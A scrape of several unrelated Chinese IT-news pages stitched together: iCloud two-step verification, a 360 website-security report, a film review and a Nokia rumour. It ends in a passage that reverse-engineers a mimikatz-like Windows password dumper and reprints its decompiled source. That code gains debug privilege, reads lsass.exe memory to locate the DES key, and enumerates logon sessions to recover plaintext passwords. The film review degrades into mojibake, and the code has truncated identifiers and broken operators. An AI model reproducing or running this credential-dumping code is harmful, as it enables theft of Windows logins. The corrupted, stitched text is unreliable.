比特客户端
您的位置：
详解大数据
详解大数据
详解大数据
详解大数据
苹果iCloud登录明日将启用两步验证机制
关键字：iCloud
　　据外媒最新报道，开始向用户发出邮件通知，他们将从当地时间10月9日开始对用户的Apple ID及储存在iCloud的数据实行两步验证机制。如果用户使用 Outlook、MozillaThunderbird或其他邮箱、通讯录、日历等第三方软件登录iCloud则都需要通过两步验证才行。
　　等到这一政策开始实行，那么但凡使用第三方软件登录iCloud的用户如果使用的是原始的Apple ID密码，系统将会自动退出，用户则需重新创建一个密码。
　　而在发出这份邮件通知之前，苹果早在上周就公布过一份如何使用软件专属密码的文件。软件专属密码是苹果在9月中旬宣布的继iCloud登录两步验证之后的又一项安全新功能。这些改变都发生在iCloud艳照门之后。苹果CEO库克向用户做出承诺，他们将大幅提升iCloud的安全性能。
相关文章：
[ 责任编辑：小石潭记 ]
社会工程学攻击在近年来的一些网…
甲骨文的云战略已经完成第一阶段…
软件信息化周刊
比特软件信息化周刊提供以数据库、操作系统和管理软件为重点的全面软件信息化产业热点、应用方案推荐、实用技巧分享等。以最新的软件资讯，最新的软件技巧，最新的软件与服务业内动态来为IT用户找到软捷径。
商务办公周刊
比特商务周刊是一个及行业资讯、深度分析、企业导购等为一体的综合性周刊。其中，与中国计量科学研究院合力打造的比特实验室可以为商业用户提供最权威的采购指南。是企业用户不可缺少的智选周刊！
比特网络周刊向企业网管员以及网络技术和产品使用者提供关于网络产业动态、技术热点、组网、建网、网络管理、网络运维等最新技术和实用技巧，帮助网管答疑解惑，成为网管好帮手。
服务器周刊
比特服务器周刊作为比特网的重点频道之一，主要关注x86服务器，RISC架构服务器以及高性能计算机行业的产品及发展动态。通过最独到的编辑观点和业界动态分析，让您第一时间了解服务器行业的趋势。
比特存储周刊长期以来，为读者提供企业存储领域高质量的原创内容，及时、全面的资讯、技术、方案以及案例文章，力求成为业界领先的存储媒体。比特存储周刊始终致力于用户的企业信息化建设、存储业务、数据保护与容灾构建以及数据管理部署等方面服务。
比特安全周刊通过专业的信息安全内容建设，为企业级用户打造最具商业价值的信息沟通平台，并为安全厂商提供多层面、多维度的媒体宣传手段。与其他同类网站信息安全内容相比，比特安全周刊运作模式更加独立，对信息安全界的动态新闻更新更快。
新闻中心热点推荐
新闻中心以独特视角精选一周内最具影响力的行业重大事件或圈内精彩故事，为企业级用户打造重点突出，可读性强，商业价值高的信息共享平台；同时为互联网、IT业界及通信厂商提供一条精准快捷，渗透力强，覆盖面广的媒体传播途径。
云计算周刊
比特云计算周刊关注云计算产业热点技术应用与趋势发展，全方位报道云计算领域最新动态。为用户与企业架设起沟通交流平台。包括IaaS、PaaS、SaaS各种不同的服务类型以及相关的安全与管理内容介绍。
CIO俱乐部周刊
比特CIO俱乐部周刊以大量高端CIO沙龙或专题研讨会以及对明星CIO的深入采访为依托，汇聚中国500强CIO的集体智慧。旨为中国杰出的CIO提供一个良好的互融互通 、促进交流的平台，并持续提供丰富的资讯和服务，探讨信息化建设，推动中国信息化发展引领CIO未来职业发展。
IT专家新闻邮件长期以来，以定向、分众、整合的商业模式，为企业IT专业人士以及IT系统采购决策者提供高质量的原创内容，包括IT新闻、评论、专家答疑、技巧和白皮书。此外，IT专家网还为读者提供包括咨询、社区、论坛、线下会议、读者沙龙等多种服务。
X周刊是一份IT人的技术娱乐周刊，给用户实时传递I最新T资讯、IT段子、技术技巧、畅销书籍，同时用户还能参与我们推荐的互动游戏，给广大的IT技术人士忙碌工作之余带来轻松休闲一刻。
微信扫一扫
关注Chinabyte比特客户端
您的位置：
详解大数据
详解大数据
详解大数据
详解大数据
年度网站安全报告：全球十大安全事件四起在中国
关键字：安全事件 网站安全 新闻
　　日前，国内最大的安全公司360(NYSE: QIHU)发布了《2014年中国网站安全报告》(以下简称《报告》)，《报告》指出，2014年，网络安全问题呈站漏洞大规模爆发、大量隐私泄露等重大安全事件高发和网站攻击开始规模化、产业化等显著特点。预计2015年，网站攻击与漏洞利用将更加规模化，安全形势不容乐观。
　　存在后门的网站数量大幅攀升
　　《报告》披露，目前有漏洞和高危漏洞的网站比例较2013年大幅下降，但网站存在后门的比例和绝对数量却大幅攀升。2014年全年，360网站安全检测共对覆盖网站199.6万个的8409台网站进行了网站后门检测，发现约3465台服务器存在后门，占比41.2%，比2013年增多了7.4个百分点。
　　图1:2013年、2014年服务器被植入后门状况对比
　　后门是一段，攻击者通过植入这段精心设计的代码来控制网站，同时，还可以获得某些敏感的信息，进一步获得服务器的控制权限。后门一般具有很强的隐蔽性，从而来达到长期控制网站的目的。
　　无论是网站服务器后门还是网站漏洞，都极易被所利用。这些漏洞或被黑客利用于盗取银行卡账号密码，或者通过漏洞植入进行破坏。此前有媒体报道称，大量12306网站用户信息遭泄露，即是网站漏洞所致;而另有媒体报道称，网管员王某利用263邮箱服务器的漏洞，登录管理员账号，导出1.6万余组企业通讯录，则是服务器漏洞被利用。
　　电商类网站安全形势堪忧
　　《报告》显示，2014年全年，360网站安全检测平台()共扫描各类网站164.2万个，其中存在安全漏洞的网站61.7万个，占扫描网站总数的37.6%;存在高危安全漏洞的网站共27.9万个，占扫描网站总数的17.0%。有漏洞和有高危漏洞的网站比例都较2013年大幅下降。
　　图2：电商类网站高危漏洞最多
　　分行业看，类网站存在高危漏洞的比例最高，达到26%;其次为生活信息类(24%)、医疗卫生类(22%)和企业公司类(21%)。银行类网站相对安全性较高，存在高危漏洞比例最低。
　　相较于2013年，电子商务类网站虽然有高危漏洞的网站比例下降了3个百分点，但排名却从第四名跃升为，安全性在各行业网站中最为堪忧。
　　由于电商网站自身的特殊性，电商网站服务器中保有大量用户个人信息和财务信息，因此电商网站安全漏洞危害极大，一旦被犯罪分子利用，将给网站本身和网站用户乃至互联网安全带来极大的危害。不法分子利用电商网站的漏洞通常会篡改网站内容，利用支付链接URL跳转对消费者进行钓鱼等;盗取用户账户，进行恶意消费;盗取电商网站，用于诈骗等违法行为。
　　从各个行业网站安全漏洞修复周期来看，音乐影视类、政务网站漏洞平均修复周期最长，分别为97天和86天，对网站安全意识有待提高;而站、医疗卫生类网站修复漏洞平均周期较短，分别为65天和66天，此几类网站修复漏洞所需时间要比音乐影视类网站少一个月左右。
　　全球十大网站安全事件四起发生在中国
　　《报告》总结了2014年全球范围内的十起网站安全事件，包括“OpenSSL心脏出血漏洞”、“eBay数据泄漏”、“被黑客攻击”等，在去年的网站安全事件中，有四起发生在中国。
　　据了解，“121中国互联网DNS大劫难”、“漏洞事件”、“中国快递1400万信息泄露”、“12306用户数据泄露”这四起网站安全事件在全社会造成了巨大影响。
　　《报告》认为，根据去年发生的多起网站安全事件来看，网站攻击与漏洞利用正在向批量化，规模化方向发展，主要表现在以下五个方面：撞库攻击越演越烈、全网知识库大大丰富、建站系统漏洞被广泛利用、新漏洞发现与利用的速度越来越快、第三方代码托管平台被攻击。
　　针对网站安全事件频发的现象，《报告》专门针对发起攻击的地域做了研究。研究发现，91.4%的攻击者IP来自境内，来自境外的攻击仅为8.6%。其中，境内攻击主要来自北京(32.9%)、江苏(13.9%)、浙江(11.4%)、山东(10.0%)、广东(7.40%)。
　　图3：发起网站漏洞攻击的地域分布
　　值得一提的是，2014年，360补天平台共收录2490名“白帽子”提交的有效0day漏洞24724个，平均每个月收录有效的0day漏洞2060个，平均每天收录有效0day漏洞70个。
　　补天平台是360互联网安全中心推出的国内首个现金奖励漏洞平台，旨在建立企业与白帽子之间的桥梁，帮助企业建立SRC(安全应急响应中心)。
　　据悉，曾发生用户数据泄漏的12306等网站均已加入360补天平台以获得查补网站漏洞的技术协助。
相关文章：
[ 责任编辑：小石潭记 ]
社会工程学攻击在近年来的一些网…
甲骨文的云战略已经完成第一阶段…
软件信息化周刊
比特软件信息化周刊提供以数据库、操作系统和管理软件为重点的全面软件信息化产业热点、应用方案推荐、实用技巧分享等。以最新的软件资讯，最新的软件技巧，最新的软件与服务业内动态来为IT用户找到软捷径。
商务办公周刊
比特商务周刊是一个及行业资讯、深度分析、企业导购等为一体的综合性周刊。其中，与中国计量科学研究院合力打造的比特实验室可以为商业用户提供最权威的采购指南。是企业用户不可缺少的智选周刊！
比特网络周刊向企业网管员以及网络技术和产品使用者提供关于网络产业动态、技术热点、组网、建网、网络管理、网络运维等最新技术和实用技巧，帮助网管答疑解惑，成为网管好帮手。
服务器周刊
比特服务器周刊作为比特网的重点频道之一，主要关注x86服务器，RISC架构服务器以及高性能计算机行业的产品及发展动态。通过最独到的编辑观点和业界动态分析，让您第一时间了解服务器行业的趋势。
比特存储周刊长期以来，为读者提供企业存储领域高质量的原创内容，及时、全面的资讯、技术、方案以及案例文章，力求成为业界领先的存储媒体。比特存储周刊始终致力于用户的企业信息化建设、存储业务、数据保护与容灾构建以及数据管理部署等方面服务。
比特安全周刊通过专业的信息安全内容建设，为企业级用户打造最具商业价值的信息沟通平台，并为安全厂商提供多层面、多维度的媒体宣传手段。与其他同类网站信息安全内容相比，比特安全周刊运作模式更加独立，对信息安全界的动态新闻更新更快。
新闻中心热点推荐
新闻中心以独特视角精选一周内最具影响力的行业重大事件或圈内精彩故事，为企业级用户打造重点突出，可读性强，商业价值高的信息共享平台；同时为互联网、IT业界及通信厂商提供一条精准快捷，渗透力强，覆盖面广的媒体传播途径。
云计算周刊
比特云计算周刊关注云计算产业热点技术应用与趋势发展，全方位报道云计算领域最新动态。为用户与企业架设起沟通交流平台。包括IaaS、PaaS、SaaS各种不同的服务类型以及相关的安全与管理内容介绍。
CIO俱乐部周刊
比特CIO俱乐部周刊以大量高端CIO沙龙或专题研讨会以及对明星CIO的深入采访为依托，汇聚中国500强CIO的集体智慧。旨为中国杰出的CIO提供一个良好的互融互通 、促进交流的平台，并持续提供丰富的资讯和服务，探讨信息化建设，推动中国信息化发展引领CIO未来职业发展。
IT专家新闻邮件长期以来，以定向、分众、整合的商业模式，为企业IT专业人士以及IT系统采购决策者提供高质量的原创内容，包括IT新闻、评论、专家答疑、技巧和白皮书。此外，IT专家网还为读者提供包括咨询、社区、论坛、线下会议、读者沙龙等多种服务。
X周刊是一份IT人的技术娱乐周刊，给用户实时传递I最新T资讯、IT段子、技术技巧、畅销书籍，同时用户还能参与我们推荐的互动游戏，给广大的IT技术人士忙碌工作之余带来轻松休闲一刻。
微信扫一扫
关注Chinabyte比特客户端
您的位置：
详解大数据
详解大数据
详解大数据
详解大数据
《一步之遥》最新影评 云里雾里看不懂*
关键字：《一步之遥》 电影 姜文 影评
　　电影《一步之遥》刚刚上映没几天，看过电影的人也不少了，很多人看过影评后再去看电影，说实话，小编看完影评之后真不知道是去看还是不去看了，观影者分为极好极坏两个对立面。
　　12月15日晚，姜文新片《一步之遥》在有2800多个席位的北京奥体中心IMAX临时巨幕馆首映，这部让众多观众期待了四年，历经映前审查风波的电影到底如何？以下是采自看过片的电影记者、业内人士、普通观众的解答。
　　调查||关于《一步之遥》的10个疑问
　　Q1：观感如何?
　　A：累。一是3D电影本身就费眼睛。二是片长140分钟，其中还有剧情比较拖沓，比如一开场的选美大赛就有约三十多分钟，舞蹈很绚丽，像看一台大型晚会。三是全片节奏从头激烈到尾，没有轻重缓急的起伏，视觉和听觉一直处于超饱和状态。打个比方，就像XX，从头到尾不换姿势，也不休息，吭哧到最后，好像也没怎么高潮。刚参加过首映礼的任志强评论说“有趣，但我笨，没看懂!”
　　Q2：讲的是什么?
　　A：虽然是歌舞和冒险类型包装，但它实际上是个爱情片。姜文这次变成了周星驰，先让舒淇演的选美冠军爱上了他演的比赛操办者马走日，用枪逼着让他说，“我爱你”，还非要嫁给他。第二段是让周韵饰演的大帅女儿爱上马走日，救这个杀人犯(选美冠军死在了他的车上)出狱，要跟他奔走。可惜，两次都以悲剧收场。同样的女追男爱情，周星驰拍了就浪漫，姜文拍了，有人说自恋。
　　Q3：啥风格?
　　A：绚丽程度比《了不起的盖茨比》和《红磨坊》有过之而无不及。另全片有一种荒诞感，人物的行为不能用正常的逻辑来推敲，比如，两位女主角为何突然死心塌地地爱上马走日，就要观众费脑筋来找理由。还有，《一步之遥》呈现了一种很梦幻的感觉，尤其是马走日和选美冠军抽大烟后开车经过街道，走出郊区，飞上月亮的段落。
　　Q4：表演有得谈吗?
　　A：《一步之遥》的台词和表演很有舞台剧的味道，可能跟编剧组核心成员廖一梅的加入有关，她写过《恋爱的犀牛》、《琥珀》、《柔软》等名剧，有些先锋色彩，也有哲思。主角姜文除了旁白，从头到尾的台词基本都是喊出来的，真的像在演舞台剧。演员最最突出的要数文章，他诠释元帅七公子飞扬跋扈，暴躁乖戾的做派很是到位。
　　Q5：有哪些姜式趣味?
　　A：姜文大背头，兜里插着玫瑰花，抱着兔子出场致敬了《教父》，穿着长袍大马褂的造型致敬了《茶馆》(于是之是他在中学表演时曾专门模范过的演员)、戴着面具致敬了《黑暗骑士崛起》。葛优的小胡子造型会让你想到卓别林。另外，姜文还尝试了戏中戏，就是在电影里拍电影，这不能算致敬了，因为玩过这一招的电影太多了，有名的像《八部半》、《艾德-伍德》、《艺术家》、《色情男女》等。
　　Q6：删改内容多吗?
　　A：此前曝光的审查意见里说，影片一些情节、台词存在低级、粗俗，调侃经典及古今历史名人，性暗示等问题，需修改：1、开场舞及海军舞中踢腿、扭臀的近景需删除;从舞女两腿中间滑过的运动镜头需删除;武七在二楼拍舞女臀部画面及武七站在栏杆线的画面需删除;2、马走日台词：“完颜英是完颜阿骨达孙女”，“我还是成吉思汗本人呢”删除;关于“苟日新，日日新”、“一毛不留”及“初夜权”的解释，需删改;3、牛氖窝萁巧奶ù剩霸木∪思浯荷ナ钚判摹保庇怖世实氐饶恪薄涫担呐Φ夭淮恚簧俣荚谀亍
　　Q7：有什么深刻表达?
　　A：可能根本就没隐喻，也可能姜文的隐喻太深，一般观众看不出来。如果要分析点什么出来，那可以说，姜文的角色在乱世中沉浮，以悲剧收场，是个伤心的人物。葛优的角色顺势往上爬，对帮了他的人落井下石，小人之为。舒淇和周韵是那个男权社会中的两个女性，但她们都有一个共同特点，就是有主见，敢于追求自己喜欢的，不被世俗的理念所束缚。
　　Q8：3D效果怎么样?
　　A：好像没必要拍3D吧，效果不是很突出。而且，3D的坏处一是增加眼睛的疲劳，二来让整个视野变小，其实不利于一些场景的展现。对于拍3D，姜文的说法是，半推半就，一方面是应主办方要求，一方面是自己也觉得可以尝试。不过，有同时看过《智取威虎山3D》的观众反馈，后者的效果要好很多。
　　Q9：姜文会掉下神坛吗?
　　A：有观众评级陈凯歌有《无极》，张艺谋有《三枪》，冯小刚有《私人订制》，姜文有《一步之遥》，你觉得呢?而且，你不觉得马珂之于姜文跟当年的张伟平之于张艺谋有点像吗，他们作为制片人的本事在于，电影还没上映，势已经造足了。
　　Q10：票房能卖多少?
　　A：现在的中国电影市场，票房和口碑几乎没关系。所以，即使《一步之遥》首映后评价如何，都不妨碍一部分已经买到票的观众(据称已经预售出2亿票房)，和一部分充满好奇心的观众去捧场。在一份网友关于《一步之遥》票房预测的调查中，最低有2亿，最高有20亿，取数百人的预测平均值约9.7亿，高过《让子弹飞》的6.77亿。《一步之遥》将于12月18日上映，到24日会有徐克《智取威虎山3D》和顾长卫《微爱》接棒。《智取威虎山》小范围放映后已获得一片赞誉声，贺岁档的冠军之争就在这两片之间。
相关文章：
[ 责任编辑：Bing ]
1月31日，2015年中国企业…
甲骨文的云战略已经完成第一阶段…
软件信息化周刊
比特软件信息化周刊提供以数据库、操作系统和管理软件为重点的全面软件信息化产业热点、应用方案推荐、实用技巧分享等。以最新的软件资讯，最新的软件技巧，最新的软件与服务业内动态来为IT用户找到软捷径。
商务办公周刊
比特商务周刊是一个及行业资讯、深度分析、企业导购等为一体的综合性周刊。其中，与中国计量科学研究院合力打造的比特实验室可以为商业用户提供最权威的采购指南。是企业用户不可缺少的智选周刊！
比特网络周刊向企业网管员以及网络技术和产品使用者提供关于网络产业动态、技术热点、组网、建网、网络管理、网络运维等最新技术和实用技巧，帮助网管答疑解惑，成为网管好帮手。
服务器周刊
比特服务器周刊作为比特网的重点频道之一，主要关注x86服务器，RISC架构服务器以及高性能计算机行业的产品及发展动态。通过最独到的编辑观点和业界动态分析，让您第一时间了解服务器行业的趋势。
比特存储周刊长期以来，为读者提供企业存储领域高质量的原创内容，及时、全面的资讯、技术、方案以及案例文章，力求成为业界领先的存储媒体。比特存储周刊始终致力于用户的企业信息化建设、存储业务、数据保护与容灾构建以及数据管理部署等方面服务。
比特安全周刊通过专业的信息安全内容建设，为企业级用户打造最具商业价值的信息沟通平台，并为安全厂商提供多层面、多维度的媒体宣传手段。与其他同类网站信息安全内容相比，比特安全周刊运作模式更加独立，对信息安全界的动态新闻更新更快。
新闻中心热点推荐
新闻中心以独特视角精选一周内最具影响力的行业重大事件或圈内精彩故事，为企业级用户打造重点突出，可读性强，商业价值高的信息共享平台；同时为互联网、IT业界及通信厂商提供一条精准快捷，渗透力强，覆盖面广的媒体传播途径。
云计算周刊
比特云计算周刊关注云计算产业热点技术应用与趋势发展，全方位报道云计算领域最新动态。为用户与企业架设起沟通交流平台。包括IaaS、PaaS、SaaS各种不同的服务类型以及相关的安全与管理内容介绍。
CIO俱乐部周刊
比特CIO俱乐部周刊以大量高端CIO沙龙或专题研讨会以及对明星CIO的深入采访为依托，汇聚中国500强CIO的集体智慧。旨为中国杰出的CIO提供一个良好的互融互通 、促进交流的平台，并持续提供丰富的资讯和服务，探讨信息化建设，推动中国信息化发展引领CIO未来职业发展。
IT专家新闻邮件长期以来，以定向、分众、整合的商业模式，为企业IT专业人士以及IT系统采购决策者提供高质量的原创内容，包括IT新闻、评论、专家答疑、技巧和白皮书。此外，IT专家网还为读者提供包括咨询、社区、论坛、线下会议、读者沙龙等多种服务。
X周刊是一份IT人的技术娱乐周刊，给用户实时传递I最新T资讯、IT段子、技术技巧、畅销书籍，同时用户还能参与我们推荐的互动游戏，给广大的IT技术人士忙碌工作之余带来轻松休闲一刻。
微信扫一扫
关注Chinabyte您当前的位置 ：&&&&&&
Android系统Intel处理器 Nokia C1曝光
　　昔日手机霸主诺基亚(Nokia)似乎不甘寂寞，11月刚推出平板N1，紧接着又有传闻说其智能手机Nokia C1可能在明年上市，曾经的芬兰巨人似乎有东山再起的苗头。
　　但事实上，诺基亚手机部门已经卖给微软，按合约规定，诺基亚继续拥有和保留诺基亚品牌。根据交易条款，微软同意获得10年授权，在现有和即将推出的Series 30和Series 40操作界面中使用诺基亚品牌。交易结束之后，30个月内诺基亚禁止在移动设备销售中使用诺基亚品牌。
　　也就是说，在日之前诺基亚被禁止在自有移动设备中使用诺基亚品牌。不过，鉴于跟老合作伙伴鸿海子公司富士康多年的业务关系，诺基亚可能找到曲线自救的途径另起炉灶。
　　但如何摆脱品产授权的困扰，目前尚未公布明确并且可行的具体方案。
　　根据国外网站消息，诺基亚新机将取名Nokia C1，采用5英寸屏幕、Intel处理器、2GB运行内存与800万像素摄像头。Nokia C1有可能会在明年1月的CES国际电子展上现身，并搭载Android 5.0操作系统。
　　不过考虑到与微软的合约协议，以及本身在Android方面的起步时间，诺基亚会以什么样的姿态重新回归手机市场，还有待时间考证。
新闻纠错：022-
我来说两句
热点新闻排行榜
| 举报邮箱：jubao@
(C) 2000-.cn, Tianjin ENORTH NETNEWS Co.,LTD.All rights
本网站由天津北方网版权所有比特客户端
您的位置：
详解大数据
详解大数据
详解大数据
详解大数据
对windows密码抓取神器mimikatz的逆向分析
关键字：Mimikatz windows密码 新闻
　　mimikatz可谓获取windows明文密码神器，新版本更是加上了64位支持。用过一个小型获取明文密码程序，只有一个可执行文件ReadPSW.exe，通过逆向写出了源代码，稍微改改可能也可以支持64位。分享一下逆向过程和工作原理。
　　了解mimikatz
　　只要借用一下电脑，便可轻松拿到密码……“女神，借用电脑一看可否?”
　　大神们都知道的东西吧，渗透测试常用工具。法国一个牛B的人写的轻量级，可以帮助安全测试人员抓取Windows密码。
　　mimikatz 最近发布了它的2.0版本，抓密码命令更加简单了，估计作者也看到了对它这个神器最多的研究就是直接抓密码，为神马不发布一个直接一键版，哈哈哈哈哈。新功能还包括能够通过获取的kerberos登录凭据，绕过支持RestrictedAdmin模式的或win2012svr的远程终端(RDP) 的登陆认证。建议默认禁止RestrictedAdmin模式登录。更多内容点我
　　逆向过程
　　我喜欢先用IDA看大致流程，遇到难以静态看出来的函数再用OD或者windbg。IDA F5 main函数，一段一段的看。
　　int __cdecl main_0() { // eax@15 HMODULE ModuleSecur32; // eax@15 int LsaEnumerateLogonS // eax@15 int LsaGetLogonSessionD // eax@15 int LsaFreeReturnB // eax@15 // eax@27 // eax@27
// eax@27 i // eax@27 int status7; // eax@27 const void *B // [sp+7Ch] [bp-2E0h]@25 SIZE_T nS // [sp+80h] [bp-2DCh]@25 int pLsaFreeReturnB // [sp+88h] [bp-2D4h]@15 int pLsaGetLogonSessionD // [sp+8Ch] [bp-2D0h]@15 int pLsaEnumerateLogonS // [sp+90h] [bp-2CCh]@15 HMODULE Secur32; // [sp+94h] [bp-2C8h]@15 LPCVOID l_LogSessL // [sp+98h] [bp-2C4h]@15 int LsaUnprotectM // [sp+9Ch] [bp-2C0h]@15 struct _OSVERSIONINFOA VersionI // [sp+A8h] [bp-2B4h]@5 HANDLE L // [sp+13Ch] [bp-220h]@3 LPCVOID[128]; // [sp+140h] [bp-21Ch]@18 LPCVOID *F // [sp+340h] [bp-1Ch]@20 int LogonSessionN // [sp+344h] [bp-18h]@18 int ListE // [sp+348h] [bp-14h]@15 SIZE_T NumberOfBytesR // [sp+34Ch] [bp-10h]@18 int hDllL // [sp+358h] [bp-4h]@15
　　变量名大多是修改过的，通过分析子函数的功能做相应的改变，看起来方便一些。
　　memset(&tt, -, 0x320u); if ( EnableDebugPrivilege() != 1 ) printf("EnableDebugPrivilege fail !");
　　首先提权，比较简单：
　　pToken = &TokenH dwAccess = TOKEN_ALL_; ProcessHandle = GetCurrentProcess(); retProcessHandle = _chkesp(&dwAccess == &dwAccess, ProcessHandle, &dwAccess); status = OpenProcessToken(retProcessHandle, dwAccess, pToken); status1 = LookupPrivilegeValueA(0, "SeDebugPrivilege", &Luid); NewState.PrivilegeCount = 1; NewState.Privileges[0].Luid.LowPart = Luid.LowP NewState.Privileges[0].Luid.HighPart = Luid.HighP NewState.Privileges[0].Attributes = 2; status2 = AdjustTokenPrivileges(TokenHandle, 0, &NewState, 0x10u, 0, 0);
　　接着main函数流程：
　　Lsass = GetProcessHandle("lsass.exe"); if ( Lsass ) { offset_one = 0; offset_two = -1; memset(&VersionInformation, 0, 0x94u); VersionInformation.dwOSVersionInfoSize = 148; status = GetVersionExA(&VersionInformation); _chkesp(&t == &t, status, &v48); if ( VersionInformation.dwMajorVersion == 5 ) { if ( VersionInformation.dwMinorVersion == 1 ) { offset_one = 36; offset_two = 2; } else { if ( VersionInformation.dwMinorVersion == 2 ) { offset_one =; offset_two = 4; } } } else { if ( VersionInformation.dwMajorVersion == 6 ) { offset_one = 32; offset_two = 1; } } if ( offset_two == -1 ) { status12 = CloseHandle(Lsass); _chkesp(&t == &t, status12, &v48); returned = 0; }
　　上面工作主要是：获取lsass.exe进程句柄、根据不同版本赋值两个偏移量。可以看出支持xp和2003，之后版本vista、win7等使用同一偏移量。
　　else { hdll = LoadLibraryA("lsasrv.dll"); hDllLsasrv = _chkesp(&t == &t, hdll, &v48); LsaUnprotectMemory = GetFunctionAddr(hDllLsasrv, 0x7FFFDDDDu, db_8b_ff, 14u);
　　这个GetFunctionAddr是我的，跟进去看一下实现就知道了：
　　int __cdecl GetFunctionAddr(int Module, unsigned int Limit, int Symbol, unsigned int Length) { return RealGetFunctionAddr(Module, Limit, Symbol, Length); }
　　是一个跳转，接着跟进：
　　int __cdecl RealGetFunctionAddr(int Module, unsigned int Limit, int Symbol, unsigned int Length) { while ( Length + Module &= Limit ) { label = S for ( i = 0; i & Length && *Module == * ++i ) { ++M ++ } if ( i == Length ) ModuleModule = Module - i + 1; } }
　　是用特征码查找函数地址的，想知道是什么函数最好用windbg跟一下，发现找到了lsasrv.dll的LsaUnprotectMemory 函数，这里我也对变量名进行了重命名。该函数用于解密LsaProtectMemory加密内存，这两个函数在LSA中用得非常多。
　　l_LogSessList = GetWdigestl_LogSessList(); DesKey(Lsass, hDllLsasrv, offset_two);
　　这两个函数挺关键，需要结合OD动态调试，先看第一个，中间有个类似上面的跳转，直接看实现函数：
　　unsigned int __cdecl RealGetFunction() { HMODULE hM // eax@1 unsigned int moduleB // [sp+4Ch] [bp-10h]@1 u // [sp+50h] [bp-Ch]@1 int SpInstanceI // [sp+54h] [bp-8h]@1 HMODULE hLibM // [sp+58h] [bp-4h]@1 memset(&v6, -, 0x50u); t1 = LoadLibraryA("wdigest.dll"); hModule = _chkesp(&v5 == &v5, t1, &v11); hLibModule = hM v2 = GetProcAddress(hModule, "SpInstanceInit"); SpInstanceInit = _chkesp(&v5 == &v5, v2, &v11); moduleBase = hLibM returned = 0; while ( moduleBase & SpInstanceInit && moduleBase ) { returned = moduleB moduleBase = GetFunctionAddr(moduleBase + 8, SpInstanceInit, db_8b_45, 8u); } returned = *(returned - 4); status = FreeLibrary(hLibModule); _chkesp(&v5 == &v5, status, &v11);
　　首先加载wdigest.dll，这里有详细的介绍。然后获取SpInstanceInit的地址，接着是一个查找函数的循环，根据特征码在SpInstanceInit地址低位查找某个地址，使用windbg可以看到要找的东西：
　　0:000& ln eax
　　(742ec29c) +0xc29c
　　这并不是一个函数，具体的作用现在还不知道。后面会用到。
　　看下面的函数，这个函数实际上是用来产生DES的密钥：
　　const void *__cdecl make_DESKey(HANDLE hProcessLsass, int hDllLsasrv, int offset) { // eax@1 const void *dwR // eax@1 int K // eax@4 // [sp+Ch] [bp-68h]@1 int OSV // [sp+4Ch] [bp-28h]@1 unsigned int HeapR // [sp+50h] [bp-24h]@1 const void *B // [sp+54h] [bp-20h]@4 LPCVOID g_pDESXK // [sp+58h] [bp-1Ch]@4 LPCVOID lpB // [sp+5Ch] [bp-18h]@1 SIZE_T NumberOfBytesR // [sp+60h] [bp-14h]@1 SIZE_T nS // [sp+64h] [bp-10h]@1 int pImageNtH // [sp+68h] [bp-Ch]@1 int hTmpDllL // [sp+6Ch] [bp-8h]@1 int DataSECTION; // [sp+70h] [bp-4h]@1 int v27; // [sp+74h] [bp+0h]@1 memset(&buffer, -, 0x68u); hTmpDllLsasrv = hDllL DataSECTION = *(hDllLsasrv + 60) + hDllLsasrv + 288; lpBuffer = (hDllLsasrv + *(DataSECTION + 12)); // 获取lsasrv.dll的数据区 nSize = ((*(DataSECTION + 8) && 12) + 1) && 12; // 数据区大小 status = ReadProcessMemory(hProcessLsass, lpBuffer, lpBuffer, nSize, &NumberOfBytesRead); //读取数据区内容 _chkesp(&v15 == &v15, status, &v27); pImageNtHeaders = hDllLsasrv + *(hTmpDllLsasrv + 60); HeapReverse = hDllLsasrv + *(pImageNtHeaders + 80); dwResult = OSVersion = if ( offset == 1 ) { v8 = LoadLibraryA("bcrypt.dll"); _chkesp(&v15 == &v15, v8, &v27); v9 = LoadLibraryA("bcryptprimitives.dll"); _chkesp(&v15 == &v15, v9, &v27); v10 = GetFunctionAddr(hDllLsasrv, HeapReverse, "3仪E\b", 0xCu); //根据特征码查找存放DES_KEY的地址 g_pDESXKey = v10; g_pDESXKey = *(v10 - 1); v11 = ReadProcessMemory(hProcessLsass, g_pDESXKey, &Buffer, 4u, &NumberOfBytesRead); _chkesp(&v15 == &v15, v11, &v27); v12 = ReadProcessMemory(hProcessLsass, Buffer, &t_Key, 0x200u, &NumberOfBytesRead); // 通过两次内存查找找到KEY _chkesp(&v15 == &v15, v12, &v27); lpBuffer = g_pDESXK *g_pDESXKey = &t_K v13 = ReadProcessMemory(hProcessLsass, lpBaseAddress, &unk_42BFB8, 0x200u, &NumberOfBytesRead); _chkesp(&v15 == &v15, v13, &v27); lpBuffer = &lpBaseA lpBaseAddress = &unk_42BFB8; v14 = ReadProcessMemory(hProcessLsass, dword_42AFC4, &unk_42ADB8, 0x200u, &NumberOfBytesRead); dwResult = _chkesp(&v15 == &v15, v14, &v27); dword_42AFC4 = &unk_42ADB8; } else { if ( OSVersion == 2 || OSVersion == 4 ) { Key = GetFunctionAddr(hDllLsasrv, HeapReverse, Key_Symbol, 0xCu); g_pDESXKey = K g_pDESXKey = *(Key + 12); v6 = ReadProcessMemory(hProcessLsass, g_pDESXKey, &Buffer, 4u, &NumberOfBytesRead); _chkesp(&v15 == &v15, v6, &v27); v7 = ReadProcessMemory(hProcessLsass, Buffer, &t_Key, 0x200u, &NumberOfBytesRead); _chkesp(&v15 == &v15, v7, &v27); dwResult = g_pDESXK lpBuffer = g_pDESXK *g_pDESXKey = &t_K } } return dwR }
　　根据最初得到的偏移，读取进程地址空间，获取DES的密钥。了解了这两个函数内容接着回归main函数：
　　status13 = LoadLibraryA("Secur32.dll"); ModuleSecur32 = _chkesp(&t == &t, status13, &v48); Secur32 = ModuleSecur32; LsaEnumerateLogonSessions = GetProcAddress(ModuleSecur32, "LsaEnumerateLogonSessions"); pLsaEnumerateLogonSessions = _chkesp(&t == &t, LsaEnumerateLogonSessions, &v48); LsaGetLogonSessionData = GetProcAddress(Secur32, "LsaGetLogonSessionData"); pLsaGetLogonSessionData = _chkesp(&t == &t, LsaGetLogonSessionData, &v48); LsaFreeReturnBuffer = GetProcAddress(Secur32, "LsaFreeReturnBuffer"); pLsaFreeReturnBuffer = _chkesp(&t == &t, LsaFreeReturnBuffer, &v48); us1 = (pLsaEnumerateLogonSessions)(&count, &ListEntry);
　　加载secur32.dll，然后获取几个函数的地址，枚举登陆会话和获取登陆会话数据。接着调用LsaEnumerateLogonSessions得到当前登录的会话个数以及所有会话组成的列表。MSDN上说明了这个函数，会返回会话的LUID。
